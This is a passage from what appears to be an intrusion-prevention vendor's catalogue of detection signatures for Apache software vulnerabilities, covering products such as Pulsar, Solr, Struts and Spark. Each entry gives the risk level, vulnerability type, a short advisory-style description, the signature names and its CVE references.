Description: A vulnerability in Apache OpenOffice which allows remote attackers to execute arbitrary code via a malicious macro placed in a text document.
Situation: File-Text_Apache-OpenOffice-Text-Document-Malicious-Macro-Execution
Back to top

Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Apache Software Foundation Pluto
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Pluto
Type: Malfunction
Description: Improper validation of HTTP requests causes an arbitrary file upload vulnerability in Apache Pluto. A successful exploit allows an attacker to upload abitrary files to the target system.
Situation: HTTP_CRL-Apache-Pluto-Portletv3annotateddemo-Multipartportlet-Arbitrary-File-Upload
References:
CVE-2018-1306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1306
Back to top

Apache-Pulsar-JSON-Web-Token-Authentication-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation Pulsar
Risk: Moderate
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Apache Software Foundation Pulsar
Type: Malfunction
Description: There exists an authentication bypass vulnerability in the JSON Web Token authentication module of Apache Pulsar. Successful exploitation could lead in authentication bypass of the affected service.
Situation: Generic_CS-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
HTTP_CSH-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
References:
CVE-2021-22160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22160
Back to top

Apache-Pulsar-Unpack-Directory-Traversal

About this vulnerability: A vulnerability in Apache Pulsar
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: Apache Software Foundation Pulsar
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Apache Pulsar. The vulnerability is due to improper validation of file names inside of .jar or .nar files uploaded to the server. Successful exploitation could result in an attacker writing files to arbitrary locations on the target server, which may lead to arbitrary code execution under the security context of the user running the Pulsar server.
Situation: File-Member-Name_Apache-Pulsar-Unpack-Directory-Traversal
References:
CVE-2024-27317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27317
Back to top

Apache-Qpid-Sequence-Set-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation QPID
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache QPID
Type: Input Validation
Description: A denial of service vulnerability exists in Apache Qpid. The vulnerability is due to an assertion failure while processing a sequence-set type field with the maximum possible range. A remote, unauthenticated attacker could exploit this vulnerability by sending any control or command assembly that requires a sequence-set type field with a maximum possible range to the QPID broker. Successful exploitation will lead to abnormal termination of the program resulting in a denial of service condition
Situation: Generic_CS-Apache-Qpid-Sequence-Set-Denial-Of-Service
References:
CVE-2015-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0203
OSVDB-117019
http://www.osvdb.org/117019
Back to top

Apache-Qpid-Session.gap-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation QPID
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache QPID
Type: Input Validation
Description: A denial of service vulnerability exists in Apache Qpid. The vulnerability is due to an assertion failure prior to session establishment when processing the session.gap control segment. A remote, authenticated attacker could exploit this vulnerability by sending an out of sequence session.gap packet to the QPID broker. Successful exploitation will lead to abnormal termination of the program resulting in a denial of service condition.
Situation: Generic_CS-Apache-Qpid-Session.gap-Denial-Of-Service
References:
CVE-2015-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0203
OSVDB-117019
http://www.osvdb.org/117019
Back to top

Apache-Rave-User-Information-Disclosure

About this vulnerability: An Apache Rave User Information Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Rave
Type: Configuration Error
Description: A vulnerability in Apache Rave, versions 0.11 through 0.20, which allows remote attackers to obtain sensitive information about all user accounts via the offset parameter.
Situation: HTTP_CSU-Apache-Rave-User-Information-Disclosure
References:
CVE-2013-1814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1814
BID-58455
http://www.securityfocus.com/bid/58455
OSVDB-91235
http://www.osvdb.org/91235
Back to top

Apache-RocketMQ-Buildstartcommand-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation RocketMQ
Risk: Moderate
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Platform: Generic
Software: Apache RocketMQ
Type: Input Validation
Description: Improper validation of the configuration file of a broker server causes a command injection vulnerability in Apache RocketMQ. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.
Situation: Generic_CS-Apache-RocketMQ-Buildstartcommand-Command-Injection
References:
CVE-2023-33246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33246
Back to top

Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write

About this vulnerability: A vulnerability in Apache RocketMQ
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: Apache RocketMQ
Type: Malfunction
Description: An arbitrary file write vulnerability has been reported in the NameServer component of Apache RocketMQ. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the affected application.
Situation: Generic_CS-Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write
References:
CVE-2023-37582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37582
Back to top

Apache-Roller-OGNL-Injection-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Apache Roller
Risk: Moderate
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Roller
Type: Input Validation
Description: There is a command execution vulnerability in Apache Roller. The vulnerability is due to a lack of sanitization on OGNL expressions passed to certain methods. This can lead to OGNL injection which can result in remote code execution. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to a site using the vulnerable application. Successful exploitation could lead to remote code execution in the context of the affected application.
Situation: HTTP_CSU-Apache-Roller-OGNL-Injection-Remote-Code-Execution
References:
CVE-2013-4212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4212
BID-63928
http://www.securityfocus.com/bid/63928
OSVDB-100342
http://www.osvdb.org/100342
Back to top

Apache-Root-Privilege-Escalation

About this vulnerability: An attempt to exploit a vulnerability in Apache detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: An attempt to exploit a vulnerability in Apache detected.
Situation: File-Text_Apache-Root-Privilege-Escalation
References:
CVE-2019-0211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211
Back to top

Apache-Santuario-Xml-Security-For-Java-Dtd-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Santuario XML Security for Java
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Santuario; Apache XML Security for Java
Type: Malfunction
Description: A denial of service vulnerability exists in Apache Santuario XML Security for Java. The vulnerability is due to the allowing of Document Type Definitions (DTDs) when validating signatures. A remote attacker can exploit this vulnerability by providing a specially crafted XML signature. Successful exploitation could result in the application crashing resulting in a denial of service condition.
Situation: HTTP_CS-Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
File-Text_Xml-Dtd-Nested-Entities-Multiple-Vulnerabilities
References:
CVE-2013-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4517
BID-64437
http://www.securityfocus.com/bid/64437
OSVDB-101169
http://www.osvdb.org/101169
Back to top

Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation ShardingSphere
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1663-5242
Platform: Generic
Software: Apache ShardingSphere
Type: Input Validation
Description: There has been reported a remote code execution vulnerability in Apache ShardingSphere. Successful exploitation could result in arbitrary code execution.
Situation: HTTP_CRL-Apache-Shardingsphere-SnakeYaml-Insecure-Deserialization
References:
CVE-2020-1947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1947
Back to top

Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability

About this vulnerability: A vulnerability in Apache ShenYu Admin.
Risk: High
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Platform: Generic
Software: Apache ShenYu Admin
Type: Malfunction
Description: A vulnerability in Apache ShenYu Admin, versions 2.3.0 and 2.4.0, which allows remote attackers to bypass access control policy by sending crafted requests to the target server, due to improper handling of incoming HTTP requests.
Situation: File-Text_Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability
References:
CVE-2021-37580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37580
Back to top

Apache-ShenYu-Plugin-API-Information-Disclosure

About this vulnerability: A vulnerability in Apache ShenYu Admin.
Risk: High
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Apache ShenYu Admin
Type: Malfunction
Description: A vulnerability in Apache ShenYu Admin, versions 2.4.0 and 2.4.1, which allows remote attackers to gain sensitive infomation and create plugins by sending a crafted request, due to the improper authentication for the /plugin API endpoint.
Situation: HTTP_CS-Apache-ShenYu-Plugin-API-Information-Disclosure
References:
CVE-2022-23944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23944
Back to top

Apache-Shiro-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Apache Shiro detected
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: Apache Shiro
Type: Malfunction
Description: An attempt to exploit a vulnerability in Apache Shiro detected. This situation can generate false-positives on legit traffic.
Situation: HTTP_CSH-Apache-Shiro-Remote-Code-Execution
References:
CVE-2016-4437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437
Back to top

Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection

About this vulnerability: A vulnerability in Apache Software Foundation SkyWalking
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache SkyWalking
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Apache SkyWalking H2/MySQL storage implementations. The vulnerability is due to insufficient validation of the user-supplied input for wildcard alarm search query through GraphQL protocol. A remote attacker could exploit this vulnerability by sending malicious requests to a vulnerable Apache SkyWalking storage. Successful exploitation of this vulnerability could result in execution of arbitrary SQL code and lead to information disclosure.
Situation: File-Text_Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection
References:
CVE-2020-13921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13921
Back to top

Apache-SkyWalking-Graphql-Protocol-SQL-Injection

About this vulnerability: A vulnerability in Apache SkyWalking
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache SkyWalking
Type: SQL Injection
Description: There exists a vulnerability in Apache SkyWalking, versions 6.0.0 to 6.6.0 and 7.0.0, which allows remote attackers to execute arbitrary SQL commands and disclose information due to the lack of input validation for a metadata query through the GraphQL protocol.
Situation: HTTP_CRL-Apache-SkyWalking-Graphql-Protocol-SQL-Injection
References:
CVE-2020-9483
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9483
Back to top

Apache-Solr-Config-API-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: Moderate
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: Insufficient validation of requests to the Config API in Apache Solr causes an insecure deserialization vulnerability. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.
Situation: File-Text_Apache-Solr-Config-API-Insecure-Deserialization
References:
CVE-2019-0192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0192
Back to top

Apache-Solr-Configset-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Apache Solr
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Apache Solr
Type: Directory Traversal
Description: A vulnerability in Apache Solr, versions 6.6.0 to 9.8.0, which allows remote attackers to write arbitrary files on a target server by sending a crafted request, due to the configSet upload API being susceptible to zip slip archives.
Situation: File-Member-Name_Apache-Solr-Configset-Upload-Directory-Traversal
References:
CVE-2024-52012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-52012
Back to top

Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this vulnerability: A vulnerability in Apache Solr
Risk: High
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in Apache Solr. The vulnerability is due to the software allowing Java jar and class files to be uploaded through the ConfigSets API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the user running the vulnerable server.
Situation: HTTP_CSU-Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Binary_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Zip_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Member-Name_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
References:
CVE-2023-50386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50386
Back to top

Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: Moderate
First detected in: sgpkg-ips-1087-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: There has been reported an XML external entity expansion vulnerability in Apache Solr. This vulnerability can be exploited by sending a crafted http request to the target server. Successful exploitation leads in disclosure of file or directory contents.
Situation: File-TextId_Apache-Solr-Configsets-Xml-External-Entity-Expansion-Information-Disclosure
References:
CVE-2018-8026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8026
Back to top

Apache-Solr-Data-Import-Handler-XML-External-Entity-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: Improper handling of submitted XML content causes an information disclosure vulnerability in Apache Solr. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-Apache-Solr-Data-Import-Handler-XML-External-Entity-Expansion-Information-Disclosure
References:
CVE-2018-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1308
Back to top

Apache-Solr-Dataimporthandler-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Solr
Risk: Moderate
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: There exists a remote code execution vulnerability in Apache Solr. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Apache-Solr-Dataimporthandler-Remote-Code-Execution
References:
CVE-2019-0193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0193
Back to top

Apache-Solr-Fake-URL-Authentication-Bypass

About this vulnerability: A vulnerability in Apache Solr
Risk: Moderate
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Generic
Software: Apache Solr
Type: Malfunction
Description: Improper handling of URLs causes an authentication bypass vulnerability in Apache Solr. A successful exploitation allows an attacker to access privileged API endpoints without authentication.
Situation: HTTP_CSU-Apache-Solr-Fake-URL-Authentication-Bypass
References:
CVE-2024-45216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45216
Back to top

Apache-Solr-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Apache Solr detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: Apache Solr
Type: Malfunction
Description: An attempt to exploit a vulnerability in Apache Solr detected.
Situation: HTTP_CSU-Apache-Solr-Remote-Code-Execution
References:
CVE-2019-17558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17558
Back to top

Apache-Solr-Replicationhandler-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: A server-side request forgery vulnerability has been reported in Apache Solr. The vulnerability is due to a missing validation of the masterUrl or leaderUrl request parameter to the /replication endpoint. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in information disclosure, spoofing conditions and arbitrary file write conditions.
Situation: HTTP_CSU-Apache-Solr-Replicationhandler-Server-Side-Request-Forgery
References:
CVE-2021-27905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905
Back to top

Apache-Solr-Solrresourceloader-Directory-Traversal

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: High
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1349-5242
Platform: Generic
Software: Apache Solr
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Apache Solr. The vulnerability is due to insufficient validation of the resource paths passed to certain Solr REST services. A remote attacker can exploit this vulnerability by sending a specially crafted request to Apache Solr, which leads to execution of any XSLT file that exists on the target server.
Situation: HTTP_CSU-Apache-Solr-Solrresourceloader-Directory-Traversal
References:
CVE-2013-6397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6397
BID-63935
http://www.securityfocus.com/bid/63935
OSVDB-100374
http://www.osvdb.org/100374
Back to top

Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Solr
Risk: Moderate
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Solr
Type: Input Validation
Description: Improper handling of external XML entities causes a remote code execution in Apache Solr. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Solr-Xmlparser-XML-External-Entity-Expansion-Remote-Code-Execution
References:
CVE-2017-12629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12629
Back to top

Apache-Source-Asp-File-Disclosure

About this vulnerability: Apache source.asp file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache::ASP
Type: Format String
Description: The Apache module Apache::ASP version 1.93 has a vulnerability that allows reading and possibly writing files in the same directory as the vulnerable source.asp file. This may even lead to a remote system compromise with the Web server's privileges.
Situation: HTTP_CSU-Apache-Source-Asp
References:
CVE-2000-0628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628
BID-1457
http://www.securityfocus.com/bid/1457
Back to top

Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Spark
Risk: High
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: Apache Spark
Type: Malfunction
Description: A command execution vulnerability has been reported in Apache Spark. The vulnerability is due to improper handling of specific RPC request types. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the master host. A successful attack may result in the execution of arbitrary code in the security context of the user running a worker host.
Situation: Generic_CS-Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution
References:
CVE-2020-9480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9480
Back to top

Apache-Spark-Getunixgroups-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Spark
Risk: Moderate
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Apache Spark
Type: Input Validation
Description: Improper parsing of user requests when an ACL is enabled causes a command injection vulnerability in Apache Spark. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Spark-Getunixgroups-Command-Injection
References:
CVE-2022-33891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891
Back to top

Apache-Ssl-DoS-With-Plain-HTTP-Request

About this vulnerability: Apache SSL Denial of Service using plain HTTP requests
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1802-5242
Platform: Linux; OS X
Software: Apache
Type: Resource Starvation
Description: Apache version 2.0.48 and older 2.0 suffer from a memory leak in mod_ssl. This memory leak can be triggered using plain HTTP requests to the SSL port and can cause a denial of service. The modssl leaks an SSL structure for each http request.
References:
CVE-2004-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0113
BID-9826
http://www.securityfocus.com/bid/9826
OSVDB-4182
http://www.osvdb.org/4182
Back to top

Apache-Storm-Gettopologyhistory-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Storm
Risk: Moderate
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Platform: Generic
Software: Apache Storm
Type: Input Validation
Description: Missing input validation of user supplied data in requests sent to the getTopologyHistory service causes a command injection vulnerability in Apache Storm. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Apache-Storm-Gettopologyhistory-Command-Injection
References:
CVE-2021-38294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38294
Back to top

Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in a dependency called FileUpload of Apache Struts 2. A remote attacker can send a crafted payload to the target server to gain arbitrary code execution.
Situation: Generic_SS-Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization
References:
CVE-2016-1000031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031
Back to top

Apache-Struts-2-Conversionerrorinterceptor-OGNL-Script-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: A script injection vulnerability has been found in Apache Struts 2. The vulnerability is due to a design error: HTTP request parameters are interpreted as OGNL expressions when conversion errors occur. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable Struts 2 web application. A successful attack will result in the execution of arbitrary OGNL expressions (possibly OS commands) in the security context of the web application server.
Situation: HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution
References:
CVE-2012-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391
OSVDB-78277
http://www.osvdb.org/78277
Back to top

Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Malfunction
Description: There is a remote code execution vulnerability in Apache's Struts 2 web application framework. The vulnerability is due to the interpretation of cookie names as OGNL expressions. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server. A successful attack attempt could result in the execution of arbitrary Java code, including the launching of OS commands.
Situation: HTTP_CSH-Apache-Struts-2-Cookieinterceptor-OGNL-Script-Injection
References:
CVE-2012-0392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0392
OSVDB-78108
http://www.osvdb.org/78108
Back to top

Apache-Struts-2-Developer-Mode-OGNL-Execution

About this vulnerability: An Apache Struts 2 Developer Mode OGNL Execution vulnerability
Risk: High
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Configuration Error
Description: A vulnerability in Apache Struts 2 running in developer mode which allows remote attackers to execute arbitrary java code due to the DebuggingInterceptor allowing evaluation and execution of OGNL expressions.
Situation: HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution
References:
CVE-2012-0394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
OSVDB-78276
http://www.osvdb.org/78276
Back to top

Apache-Struts-2-Parametersinterceptor-OGNL-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts 2
Risk: High
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: There is a command execution vulnerability in the web application framework Apache Struts2. The vulnerability is due to insufficient input validation in the ParametersInterceptor component when parsing incoming HTTP requests. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. In an attack scenario, where arbitrary commands are executed on the target machine, the malicious command will be executed within the security context of the target service.
Situation: HTTP_CSU-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Multiple-Interceptors-OGNL-Vulnerability
HTTP_CRL-Apache-Struts-2-Command-Execution
References:
CVE-2011-3923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923
BID-51628
http://www.securityfocus.com/bid/51628
OSVDB-78109
http://www.osvdb.org/78109
Back to top

Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service

About this vulnerability: A vulnerability in XStream XStream
Risk: Moderate
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: Improper validation of XML input by the XStream library causes a denial of service vulnerability in Apache Struts. A successful exploit can cause a denial of service condition by means of stopping the server process.s vulnerability by sending a crafted XML payload to the target server. Successful exploitation will cause the application server to terminate, resulting in a denial-of-service condition.
Situation: File-Text_Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service
References:
CVE-2017-9793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9793
Back to top

Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-987-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts 2
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in Apache Struts 2 REST Plugin. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CSU-Apache-Struts-2-CVE-2017-9805-Post-To-URL
File-Text_Apache-Struts-2-CVE-2017-9805-Exploit-Attempt
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-7
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-6
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-5
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-4
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-3
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-2
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-1
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-8
References:
CVE-2017-9805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
Back to top

Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A remote code execution vulnerability exists in Apache Struts. The vulnerability is due to improper validation of user-provided input passed to the ActionMessage class. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.
Situation: HTTP_CRL-Apache-Struts-2-Struts-1-Plugin-Remote-Code-Execution
References:
CVE-2017-9791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791
Back to top

Apache-Struts-Actionform-Classloader-Security-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Struts
Type: Input Validation
Description: A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by the ActionForm class allowing for manipulation of the ClassLoader. A remote unauthenticated attacker could exploit this vulnerability by providing a "class" parameter in an HTTP request. Successful exploitation will result in a security bypass which could lead to sandbox bypass and arbitrary code execution.
Situation: HTTP_CRL-Apache-Struts-Multiple-Classloaders-Security-Bypass
References:
CVE-2014-0114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
BID-67121
http://www.securityfocus.com/bid/67121
OSVDB-106409
http://www.osvdb.org/106409
Back to top

Apache-Struts-Classloader-Manipulation-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache-Struts ClassLoader Manipulation
Risk: High
